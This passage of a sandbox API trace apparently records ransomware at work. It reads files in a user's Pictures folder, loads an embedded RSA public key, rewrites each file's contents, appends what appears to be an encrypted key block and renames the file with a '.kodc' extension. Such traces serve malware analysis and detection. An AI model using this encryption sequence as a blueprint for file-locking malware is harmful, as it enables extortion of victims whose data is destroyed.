[0099.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.821] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.821] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.821] CloseHandle (hObject=0x5cc) returned 1 [0099.823] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zj3vAJ-ez.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zj3vaj-ez.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zj3vAJ-ez.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zj3vaj-ez.bmp.kodc")) returned 1 [0099.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.824] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.825] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 1 [0099.825] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_FuF.gif") returned=".gif" [0099.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_FuF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_fuf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.825] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=70039) returned 1 [0099.825] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.828] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11171, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.828] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.830] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.830] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x11197, lpOverlapped=0x0) returned 1 [0099.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.831] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.831] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.831] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.832] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.832] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.832] GetLastError () returned 0x0 [0099.832] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.832] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.832] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.832] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.832] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x111a0) returned 0x9bb8968 [0099.833] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bf98 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7aa0 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.833] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7aa0 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7a88 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.835] GetCurrentThreadId () returned 0x42c [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5e88 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.836] GetCurrentThreadId () returned 0x42c [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7aa0 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ab8 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0099.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a70 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bfe0 | out: hHeap=0x630000) returned 1 [0099.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.840] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x11192, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x11192, lpOverlapped=0x0) returned 1 [0099.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0099.841] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11197, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.841] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.841] HeapFree (in: 